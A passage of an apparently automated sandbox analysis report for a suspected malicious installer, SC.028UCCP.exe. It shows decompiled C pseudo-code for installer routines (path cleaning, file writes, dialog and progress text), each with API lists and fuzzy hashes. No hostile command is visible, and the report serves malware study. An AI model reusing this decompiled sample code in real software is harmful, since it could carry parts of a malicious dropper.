								_t36 = E1000131B(_t63);
								L27:
								 *_t49 = _t36;
								L31:
								_t34 = GlobalFree(_t63);
								if(_v4 == 0) {
									return _t34;
								}
								if(_v4 !=  *((intOrPtr*)(_a4 + 0x814))) {
									_v4 = _v4 + 1;
								} else {
									_v4 = _v4 & 0x00000000;
								}
								continue;
							}
							if(_t33 == 2) {
								 *_t49 = E1000131B(_t63);
								_t49[1] = _t59;
								goto L31;
							}
							_t73 = _t33 - 3;
							if(_t73 == 0) {
								_t36 = E10001224(_t63);
								 *(_t62 + 0x1c) = _t36;
								goto L27;
							}
							if(_t73 > 0) {
								if(_t33 <= 5) {
									_t61 = GlobalAlloc(0x40,  *0x1000405c +  *0x1000405c);
									MultiByteToWideChar(0, 0, _t63,  *0x1000405c, _t61,  *0x1000405c);
									if( *_t62 != 5) {
										 *(_t62 + 0x1c) = _t61;
										 *_t49 = _t61;
									} else {
										_t43 = GlobalAlloc(0x40, 0x10);
										 *(_t62 + 0x1c) = _t43;
										 *_t49 = _t43;
										__imp__CLSIDFromString(_t61, _t43);
										GlobalFree(_t61);
									}
								} else {
									if(_t33 == 6 && lstrlenA(_t63) > 0) {
										 *_t60 = E100024D4(E1000131B(_t63));
									}
								}
							}
						}
						goto L31;
					}
					L9:
					_t32 = E10001224(0x10004034);
					goto L10;
				}
			}

















                                  0x100021af
                                  0x100021c3
                                  0x100021c7
                                  0x100021d2
                                  0x100021d2
                                  0x100021d9
                                  0x100021de
                                  0x00000000
                                  0x00000000
                                  0x100021e2
                                  0x100021e5
                                  0x00000000
                                  0x00000000
                                  0x100021ea
                                  0x100021f5
                                  0x10002205
                                  0x100021fc
                                  0x100021fe
                                  0x10002214
                                  0x10002214
                                  0x00000000
                                  0x100021ec
                                  0x100021ec
                                  0x10002215
                                  0x10002219
                                  0x1000221b
                                  0x1000221b
                                  0x1000221e
                                  0x10002224
                                  0x10002220
                                  0x10002220
                                  0x10002220
                                  0x10002226
                                  0x10002228
                                  0x1000222e
                                  0x100022f9
                                  0x10002234
                                  0x10002237
                                  0x100022f2
                                  0x100022de
                                  0x100022df
                                  0x100022fc
                                  0x100022fd
                                  0x10002308
                                  0x10002332
                                  0x10002332
                                  0x10002318
                                  0x10002324
                                  0x1000231a
                                  0x1000231a
                                  0x1000231a
                                  0x00000000
                                  0x10002318
                                  0x10002240
                                  0x100022ea
                                  0x100022ec
                                  0x00000000
                                  0x100022ec
                                  0x10002246
                                  0x10002249
                                  0x100022d6
                                  0x100022db
                                  0x00000000
                                  0x100022db
                                  0x1000224f
                                  0x10002258
                                  0x10002294
                                  0x100022a3
                                  0x100022ac
                                  0x100022ce
                                  0x100022d1
                                  0x100022ae
                                  0x100022b2
                                  0x100022b9
                                  0x100022bd
                                  0x100022bf
                                  0x100022c6
                                  0x100022c6
                                  0x1000225a
                                  0x1000225d
                                  0x1000227f
                                  0x10002281
                                  0x1000225d
                                  0x10002258
                                  0x1000224f
                                  0x00000000
                                  0x1000222e
                                  0x1000220a
                                  0x1000220f
                                  0x00000000
                                  0x1000220f

                                  APIs
                                  • lstrlenA.KERNEL32(?), ref: 10002264
                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 1000228E
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022A3
                                  • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022B2
                                  • CLSIDFromString.OLE32(00000000,00000000), ref: 100022BF
                                  • GlobalFree.KERNEL32 ref: 100022C6
                                  • GlobalFree.KERNEL32 ref: 100022FD
                                    • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012E1,?,100011AB,-000000A0), ref: 10001234
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.798233791.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                  • Associated: 00000000.00000002.798214888.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.798250041.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.798280096.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10000000_SC.jbxd
                                  Similarity
                                  • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpynlstrlen
                                  • String ID: @uxv
                                  • API String ID: 3955009414-3068791405
                                  • Opcode ID: 6f954f9c0618815bde6281dca4a505d58a7e7623750b0b9f916781d510563757
                                  • Instruction ID: a605aeec0f08bdd00b0ee3428b37a4786007c3c680f5ed26bc2609ce7b065058
                                  • Opcode Fuzzy Hash: 6f954f9c0618815bde6281dca4a505d58a7e7623750b0b9f916781d510563757
                                  • Instruction Fuzzy Hash: 5741AD70504306EFF364DFA48984B6BB7F8FB453E1F21492AF956C619ADB30A840DB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405E03 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00405E03(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004056B2(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405670("*?|<>/\":", _t5))) == 0) {
							E00405801(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                  0x00405e05
                                  0x00405e0d
                                  0x00405e21
                                  0x00405e21
                                  0x00405e27
                                  0x00405e34
                                  0x00405e34
                                  0x00405e35
                                  0x00405e37
                                  0x00405e3b
                                  0x00405e3d
                                  0x00405e46
                                  0x00405e48
                                  0x00405e62
                                  0x00405e6a
                                  0x00405e6a
                                  0x00405e6f
                                  0x00405e71
                                  0x00405e73
                                  0x00405e77
                                  0x00405e78
                                  0x00405e7b
                                  0x00405e83
                                  0x00405e85
                                  0x00405e89
                                  0x00000000
                                  0x00000000
                                  0x00405e8f
                                  0x00405e94
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405e94
                                  0x00405e99

                                  APIs
                                  • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\SC.028UCCP.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030E3,C:\Users\user\AppData\Local\Temp\,74D0FA90,004032BD), ref: 00405E5B
                                  • CharNextA.USER32(?,?,?,00000000), ref: 00405E68
                                  • CharNextA.USER32(?,"C:\Users\user\Desktop\SC.028UCCP.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030E3,C:\Users\user\AppData\Local\Temp\,74D0FA90,004032BD), ref: 00405E6D
                                  • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030E3,C:\Users\user\AppData\Local\Temp\,74D0FA90,004032BD), ref: 00405E7D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: Char$Next$Prev
                                  • String ID: "C:\Users\user\Desktop\SC.028UCCP.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                  • API String ID: 589700163-3761635984
                                  • Opcode ID: ca421e288064bc83167a684e77603dc3b4a1af20f0b604c6044bfd7d30eb1efe
                                  • Instruction ID: fde9db7261816c846b9818803ccfda6df055d64d399c84b755319e1cb08c2998
                                  • Opcode Fuzzy Hash: ca421e288064bc83167a684e77603dc3b4a1af20f0b604c6044bfd7d30eb1efe
                                  • Instruction Fuzzy Hash: 8911C871804B9529EB3217389C44B777FC8CB567A0F18007BE5D5723C2D67C5E428AAD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403F0F Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00403F0F(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                  0x00403f21
                                  0x00403fb5
                                  0x00000000
                                  0x00403fb5
                                  0x00403f32
                                  0x00403f36
                                  0x00000000
                                  0x00000000
                                  0x00403f3c
                                  0x00403f45
                                  0x00403f48
                                  0x00403f48
                                  0x00403f4e
                                  0x00403f54
                                  0x00403f54
                                  0x00403f60
                                  0x00403f66
                                  0x00403f6d
                                  0x00403f70
                                  0x00403f73
                                  0x00403f75
                                  0x00403f75
                                  0x00403f7d
                                  0x00403f83
                                  0x00403f83
                                  0x00403f8d
                                  0x00403f92
                                  0x00403f95
                                  0x00403f9a
                                  0x00403f9d
                                  0x00403f9d
                                  0x00403fad
                                  0x00403fad
                                  0x00000000

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                  • String ID:
                                  • API String ID: 2320649405-0
                                  • Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                  • Instruction ID: 22809f81b89203674e666fe58c9753c9cc5a050007085b97ca1eded3a3c5a137
                                  • Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                  • Instruction Fuzzy Hash: 27219671904705ABCB219F78DD08B5BBFF8AF01715F048669F996E22E0D738EA08CB55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040268D Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E0040268D(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *(_t58 - 8) = 0xfffffd66;
				_t52 = E00402A07(0xfffffff0);
				 *(_t58 - 0x44) = _t24;
				if(E004056B2(_t52) == 0) {
					E00402A07(0xffffffed);
				}
				E00405821(_t52);
				_t27 = E00405846(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x42ebb4; // 0x8c00
					 *(_t58 - 0x30) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004030C0(_t47);
						E0040308E(_t51,  *(_t58 - 0x30));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
						 *(_t58 - 0x2c) = _t56;
						if(_t56 != _t47) {
							E00402E6C( *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x38) =  *_t56;
								E00405801( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x38);
							}
							GlobalFree( *(_t58 - 0x2c));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x30), _t58 - 8, _t47);
						GlobalFree(_t51);
						 *(_t58 - 8) = E00402E6C(0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *(_t58 - 8) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x44));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                                  0x0040268d
                                  0x0040268f
                                  0x0040269b
                                  0x0040269e
                                  0x004026a8
                                  0x004026ac
                                  0x004026ac
                                  0x004026b2
                                  0x004026bf
                                  0x004026c7
                                  0x004026ca
                                  0x004026d0
                                  0x004026de
                                  0x004026e3
                                  0x004026e7
                                  0x004026ea
                                  0x004026f3
                                  0x004026ff
                                  0x00402703
                                  0x00402706
                                  0x00402710
                                  0x0040272f
                                  0x00402717
                                  0x0040271c
                                  0x00402724
                                  0x00402727
                                  0x0040272c
                                  0x0040272c
                                  0x00402736
                                  0x00402736
                                  0x00402748
                                  0x0040274f
                                  0x00402761
                                  0x00402761
                                  0x00402767
                                  0x00402767
                                  0x00402772
                                  0x00402773
                                  0x00402777
                                  0x0040277b
                                  0x00402781
                                  0x00402781
                                  0x00402788
                                  0x0040217a
                                  0x0040289f
                                  0x004028ab

                                  APIs
                                  • GlobalAlloc.KERNEL32(00000040,00008C00,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026E1
                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026FD
                                  • GlobalFree.KERNEL32 ref: 00402736
                                  • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402748
                                  • GlobalFree.KERNEL32 ref: 0040274F
                                  • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402767
                                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040277B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                  • String ID:
                                  • API String ID: 3294113728-0
                                  • Opcode ID: aa0e477bcc705a69a8995f502b88efa21aa2dc7506c02b0781f8c30215ed14f3
                                  • Instruction ID: 0916882698d777068a17293f0a109363b50d7816b2f78cc6e62ac313510dd3fa
                                  • Opcode Fuzzy Hash: aa0e477bcc705a69a8995f502b88efa21aa2dc7506c02b0781f8c30215ed14f3
                                  • Instruction Fuzzy Hash: E5319F71C00128BBDF216FA5CD89DAE7E79EF05364F20423AF920762E1C7795D408BA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404EA5 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00404EA5(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42e384; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42ec54; // 0x0
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405BBA(0, _t39, 0x429800, 0x429800, _a4);
					}
					_t26 = lstrlenA(0x429800);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42e368, 0x429800);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x429800;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x429800)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x429800, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                  0x00404eab
                                  0x00404eb7
                                  0x00404eba
                                  0x00404ec0
                                  0x00404ecc
                                  0x00404ecf
                                  0x00404ed2
                                  0x00404ed8
                                  0x00404ed8
                                  0x00404ede
                                  0x00404ee6
                                  0x00404ee9
                                  0x00404f06
                                  0x00404f0a
                                  0x00404f13
                                  0x00404f13
                                  0x00404f1d
                                  0x00404f26
                                  0x00404f32
                                  0x00404f39
                                  0x00404f3d
                                  0x00404f40
                                  0x00404f53
                                  0x00404f61
                                  0x00404f61
                                  0x00404f65
                                  0x00404f67
                                  0x00404f6a
                                  0x00000000
                                  0x00404f6a
                                  0x00404eeb
                                  0x00404ef3
                                  0x00404efb
                                  0x00404f01
                                  0x00000000
                                  0x00404f01
                                  0x00404efb
                                  0x00404ee9
                                  0x00404f74

                                  APIs
                                  • lstrlenA.KERNEL32(00429800,00000000,0041B7D0,74D0EA30,?,?,?,?,?,?,?,?,?,00402FC7,00000000,?), ref: 00404EDE
                                  • lstrlenA.KERNEL32(00402FC7,00429800,00000000,0041B7D0,74D0EA30,?,?,?,?,?,?,?,?,?,00402FC7,00000000), ref: 00404EEE
                                  • lstrcatA.KERNEL32(00429800,00402FC7,00402FC7,00429800,00000000,0041B7D0,74D0EA30), ref: 00404F01
                                  • SetWindowTextA.USER32(00429800,00429800), ref: 00404F13
                                  • SendMessageA.USER32 ref: 00404F39
                                  • SendMessageA.USER32 ref: 00404F53
                                  • SendMessageA.USER32 ref: 00404F61
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                  • String ID:
                                  • API String ID: 2531174081-0
                                  • Opcode ID: c9083a636ea0aba9f6a344c430bd940ed2e4200957790827e4701f34104d4c6e
                                  • Instruction ID: 2f329427c1d46a6eb49e6b4738c3ca031e5b71a6493834ff03b3c934a5869de4
                                  • Opcode Fuzzy Hash: c9083a636ea0aba9f6a344c430bd940ed2e4200957790827e4701f34104d4c6e
                                  • Instruction Fuzzy Hash: 1F215CB1900118BADF119FA5DC80E9EBFB9FF45354F14807AF904B62A1C7789E41CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404770 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00404770(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                  0x0040477e
                                  0x0040478b
                                  0x00404791
                                  0x004047cf
                                  0x004047cf
                                  0x004047de
                                  0x004047e5
                                  0x00000000
                                  0x004047e7
                                  0x00404793
                                  0x004047a2
                                  0x004047aa
                                  0x004047ad
                                  0x004047bf
                                  0x004047c5
                                  0x004047cc
                                  0x00000000
                                  0x004047cc
                                  0x00000000

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: Message$Send$ClientScreen
                                  • String ID: f
                                  • API String ID: 41195575-1993550816
                                  • Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                  • Instruction ID: 692a8fbc4ab4c19ca7eb206a77325c926543f9b55c82df0cde7f20f300a3092d
                                  • Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                  • Instruction Fuzzy Hash: 49015275D00219BADB01DBA5DC45FFEBBBCAF55B11F10412BBA10B72C0C7B465018BA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402B4C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00402B4C(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x414bc8; // 0x3fc1c
					_t11 =  *0x428bd8; // 0x41480
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                  0x00402b59
                                  0x00402b67
                                  0x00402b6d
                                  0x00402b6d
                                  0x00402b7b
                                  0x00402b7d
                                  0x00402b83
                                  0x00402b8a
                                  0x00402b8c
                                  0x00402b8c
                                  0x00402ba2
                                  0x00402bb2
                                  0x00402bc4
                                  0x00402bc4
                                  0x00402bcc

                                  APIs
                                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B67
                                  • MulDiv.KERNEL32(0003FC1C,00000064,00041480), ref: 00402B92
                                  • wsprintfA.USER32 ref: 00402BA2
                                  • SetWindowTextA.USER32(?,?), ref: 00402BB2
                                  • SetDlgItemTextA.USER32 ref: 00402BC4
                                  Strings
                                  • verifying installer: %d%%, xrefs: 00402B9C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: Text$ItemTimerWindowwsprintf
                                  • String ID: verifying installer: %d%%
                                  • API String ID: 1451636040-82062127
                                  • Opcode ID: c26ab94ce710109fae0aeb594136b964e4d404ed4db4c01ad1bdf6ee359589c4
                                  • Instruction ID: 7934417d2aa742b95e7c6aae042493f9aa22ef4d350393a5f66c8f789a822ef4
                                  • Opcode Fuzzy Hash: c26ab94ce710109fae0aeb594136b964e4d404ed4db4c01ad1bdf6ee359589c4
                                  • Instruction Fuzzy Hash: 81014F70640208BBEF249F60DC49EAE3B79EB00305F008039FA06E92D0D7B8A9518F59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401D26 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 71%
                                  			E00401D26() {
				void* __esi;
				int _t7;
				signed char _t13;
				struct HFONT__* _t16;
				void* _t20;
				struct HDC__* _t26;
				void* _t28;
				void* _t30;

				_t26 = GetDC( *(_t30 - 0x34));
				_t7 = GetDeviceCaps(_t26, 0x5a);
				0x40afc8->lfHeight =  ~(MulDiv(E004029EA(2), _t7, 0x48));
				ReleaseDC( *(_t30 - 0x34), _t26);
				 *0x40afd8 = E004029EA(3);
